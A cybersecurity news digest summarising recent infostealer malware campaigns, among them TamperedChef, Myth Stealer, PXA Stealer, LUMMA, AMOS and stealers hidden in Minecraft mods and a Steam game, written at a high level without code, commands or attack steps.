Threat actors are distributing a fraudulent PDF editing application named AppSuite PDF Editor, which delivers the TamperedChef info-stealer malware. This campaign, supported by Google ads and utilizing fraudulent certificates, has been orchestrated to maximize downloads before activating the malicious components that collect sensitive data and turn systems into residential proxies. Researchers warn that the operation involves multiple apps, some potentially yet to be weaponized, posing ongoing risks to users.

Trellix's Advanced Research Center has uncovered a previously undetected infostealer malware named Myth Stealer, written in Rust and marketed on Telegram since late December 2024. This malware specifically targets video games, raising concerns about the security of the gaming community.

Over 4,000 victims in 62 countries have been targeted by the PXA Stealer malware, which has stolen hundreds of credit card numbers, 200,000 passwords, and over 4 million browser cookies. This Python-based infostealer uses sophisticated phishing techniques and has evolved to evade detection, exfiltrating sensitive data through Telegram-based marketplaces.

A malicious campaign is targeting macOS developers through fake Homebrew, LogMeIn, and TradingView platforms that distribute infostealing malware such as AMOS and Odyssey. The campaign uses deceptive tactics to trick users into executing harmful commands in Terminal, leading to the theft of sensitive information from their systems. Researchers identified over 85 domains involved in this scheme, which are promoted via Google Ads to appear in search results.

A malware campaign targeting Minecraft players has been uncovered, where malicious mods and cheats are used to infect Windows devices with infostealers that steal credentials, authentication tokens, and cryptocurrency wallets. Conducted by the Stargazers Ghost Network, the operation utilizes GitHub to distribute fake mods, reaching thousands of potential victims while evading detection by antivirus software. To protect themselves, players are advised to download mods only from reputable sources and maintain caution when using GitHub links.

A hacker known as EncryptHub has compromised the early access game Chemia on Steam by injecting info-stealing malware into its files, specifically the HijackLoader and Fickle Stealer. The malware operates in the background, allowing it to harvest sensitive data from users while remaining undetected during gameplay. Users are advised to avoid downloading the game until further notice from the developer or Steam, as it remains unclear if the current version is safe.

Jamf Threat Labs has identified a new technique where attackers use PyInstaller to bundle Python-based infostealers into Mach-O executables on macOS. This method allows malware to run without requiring a native Python installation, while employing various obfuscation tactics to evade detection. The analysis includes dynamic and static examination of these malicious binaries, revealing behaviors consistent with infostealer activity.

Elastic Security Labs reports on the misuse of SHELLTER, a commercial evasion framework, by threat groups for infostealer campaigns since April 2025. The framework's advanced capabilities allow malicious actors to evade detection by anti-malware solutions, prompting the release of a dynamic unpacker by Elastic Security Labs to analyze SHELLTER-protected binaries. Key features include polymorphic obfuscation, payload encryption, and mechanisms to bypass detection systems.

More than 31,000 banking passwords from Australian customers of major banks have been stolen and are being traded online, primarily due to malware infections on users' devices. Cybersecurity experts warn that these stolen credentials pose a significant risk of financial theft, as infostealer malware can capture a wide range of sensitive information. The rise in infostealer infections highlights the ongoing threat to personal security and the need for effective protective measures.

A recent incident involving the LUMMA infostealer malware highlighted a new attack method where users were directed to a fake CAPTCHA page, leading to the execution of PowerShell commands that targeted sensitive browser data from Microsoft Edge and Google Chrome. The NCC Group's DFIR team documented the timeline of events, including initial access methods and various tactics employed by the malware to steal credentials.

Hackers have exploited a leaked copy of Shellter Elite, a commercial AV/EDR evasion tool, to deploy infostealer malware, marking the first misuse incident since the vendor's strict licensing model was introduced. Despite ongoing malicious activity since April, Shellter was not notified by security researchers at Elastic Security Labs, who later confirmed the misuse and developed detections for the affected version. Shellter has since released an updated version for vetted customers, excluding the one responsible for the leak.

Hackers are exploiting the RedTiger open-source tool to create an infostealer that targets Discord accounts, collecting sensitive data such as credentials, payment information, and personal files. The malware operates by injecting JavaScript into Discord and harvesting information from both the application and the victim's web browser. Users are advised to be cautious and take protective measures against this threat.